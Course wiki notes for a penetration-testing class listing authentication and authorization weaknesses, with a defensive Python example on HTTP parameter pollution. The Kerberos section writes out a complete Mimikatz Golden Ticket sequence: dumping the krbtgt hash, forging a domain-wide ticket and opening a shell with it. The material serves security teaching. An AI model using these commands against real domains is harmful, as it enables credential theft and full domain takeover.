App Vulnerabilities: Authentication and Authorization - Paiet/SEC-335 GitHub Wiki
- Authentication
  - Credential brute forcing
  - Default credentials
  - Weak credentials
  - Session hijacking
  - Redirect
    - Used along with social engineering (SE) to get the target to visit a malicious site
  - Kerberos exploits
    - Golden Ticket
      - Allows you to forge a ticket that grants access to anything in AD
      - Ticket valid for 10 years
      - Ticket valid even if the password for the krbtgt account is changed
      - Post-exploit
      - Use Mimikatz to perform the attack
      - From PS$ -

        ```
        whoami /user
        (grab the SID)
        privilege::debug
        lsadump::lsa /inject /name:krbtgt
        kerberos::list
        (list available tickets)
        kerberos::tgt
        (current session ticket)
        kerberos::purge
        kerberos::golden /domain:pentestplus.com /sid:SID /user:admin /ticket:golden.kirbi
        kerberos::ptt golden.kirbi
        misc::cmd
        (opens cmd using the golden ticket)
        ```

- Authorization
  - Parameter pollution
    - aka HTTP Parameter Pollution (HPP)
    - Adding multiple instances of the same HTTP parameter to a GET/POST request
  - Insecure direct object reference (IDOR)
    - A user can directly access and manipulate the value of an object reference
    - DEMO: bWAPP IDOR TICKETS (A4)
  - Security misconfigurations
    - Using home-grown encryption instead of an industry standard
    - Not removing irrelevant/outdated/unused content
    - Not removing debugging mechanisms once the app is in production
    - Sensitive data disclosure through the app
      - Unprotected files/folders
      - Directory is listable
      - Permissions are misconfigured
    - Patches/updates not applied
    - Not setting secure values in the app, API, and/or other modules
    - Client-side processing of sensitive data instead of server-side
    - Not removing default credentials
  - Cookie manipulation
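For the HTTP Parameter Pollution item under Authorization above, an added example (not from the SEC-335 wiki): the same duplicated parameter is read differently by different web stacks (first value, last value, or all values joined), so a server that guesses can be tricked; the defensive parse rejects any repeated name. The query string is constructed for the demo.

```python
# Added example, not from the SEC-335 wiki: the same duplicated parameter is
# read three different ways by common stacks, so a server should not guess.
from urllib.parse import parse_qsl

# Constructed query string: "role" is sent twice (the pollution case).
SAMPLE_QUERY = "user=alice&role=user&role=admin"

def first_wins(query: str) -> dict:
    """Some stacks keep the first occurrence of a repeated parameter."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        out.setdefault(key, value)
    return out

def last_wins(query: str) -> dict:
    """Other stacks let the last occurrence overwrite earlier ones."""
    # dict() over repeated keys keeps the last value seen.
    return dict(parse_qsl(query, keep_blank_values=True))

def comma_joined(query: str) -> dict:
    """Some stacks concatenate every occurrence with a comma."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        out[key] = value if key not in out else out[key] + "," + value
    return out

def strict_params(query: str) -> dict:
    """Defensive parsing: exactly one value per parameter, else reject."""
    out = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in out:
            raise ValueError(f"duplicate parameter: {key}")
        out[key] = value
    return out

def is_polluted(query: str) -> bool:
    """True when the query string carries any repeated parameter name."""
    try:
        strict_params(query)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    for fn in (first_wins, last_wins, comma_joined):
        print(fn.__name__, fn(SAMPLE_QUERY)["role"])
    print("reject:", is_polluted(SAMPLE_QUERY))
```

Whichever of the three readings your framework uses, an authorization decision made on `role` is only safe if the request is rejected (or logged and dropped) when the name appears more than once.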